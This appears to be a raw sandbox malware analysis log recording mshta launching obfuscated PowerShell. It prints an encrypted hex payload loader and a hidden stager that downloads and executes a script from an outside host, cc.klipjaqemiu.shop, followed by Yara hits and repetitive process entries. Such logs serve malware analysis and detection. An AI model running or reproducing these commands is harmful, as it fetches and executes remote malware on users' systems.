Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name)\|Member\|Where-Object{$_.Name-like'tomd'}).Name).Invoke($ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name).PsObject.Methods\|Where-Object{$_.Name-like'ome'}).Name).Invoke('N-O',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value\|Member)\|Where-Object{$_.Name-like'nlg'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name)\|Member\|Where-Object{$_.Name-like'tomd'}).Name).Invoke($ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name).PsObject.Methods\|Where-Object{$_.Name-like'ome'}).Name).Invoke('N-O',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value\|Member)\|Where-Object{$_.Name-like'nlg'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()	Jump to behavior

Yara detected Costura Assembly Loader

Source: Yara match	File source: 4.2.powershell.exe.6e00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2455403030.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_040A2CB5 push esp; iretd	2_2_040A2CD9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_008E385F push eax; retf	4_2_008E3860
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00AFA18D push esp; retf	4_2_00AFA321
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00AFA1CA push esp; retf	4_2_00AFA321
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00AF2D9D push eax; retf	4_2_00AF2E99
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00AFF4A5 push ebx; iretd	4_2_00AFF4BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00AFF4BB push ebx; iretd	4_2_00AFF4BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00AFF48D push ebx; iretd	4_2_00AFF4BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00AFF49D push ebx; iretd	4_2_00AFF4BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00AFDDBD push ebx; ret	4_2_00AFDDC2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BD868D push FFFFFF8Bh; iretd	4_2_06BD868F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BD863A push FFFFFF8Bh; ret	4_2_06BD863E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BDB652 push 8B008FBFh; iretd	4_2_06BDB657
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BD87B5 push FFFFFF8Bh; iretd	4_2_06BD87B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BEF6A6 push es; iretd	4_2_06BEF6AC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C031BF push es; iretd	4_2_06C031C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C17EE0 push ss; ret	4_2_06C17EE1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C1C672 push esp; ret	4_2_06C1C673
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C1C67F push esp; ret	4_2_06C1C680
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C1C61C push esp; ret	4_2_06C1C61D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C184C3 push ss; ret	4_2_06C184C4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C194C3 push es; retf	4_2_06C194C4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C1848E push ss; ret	4_2_06C1848F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C17C29 push ss; ret	4_2_06C17C2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C1B58B pushfd ; ret	4_2_06C1B5A9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C17D01 push ss; ret	4_2_06C17D02
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C17A24 push ss; ret	4_2_06C17A25
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C143CB push es; iretd	4_2_06C143CC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C1834F push ss; ret	4_2_06C18350
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C14323 push es; iretd	4_2_06C14324
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06C17B3A push ss; ret	4_2_06C17B3B

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
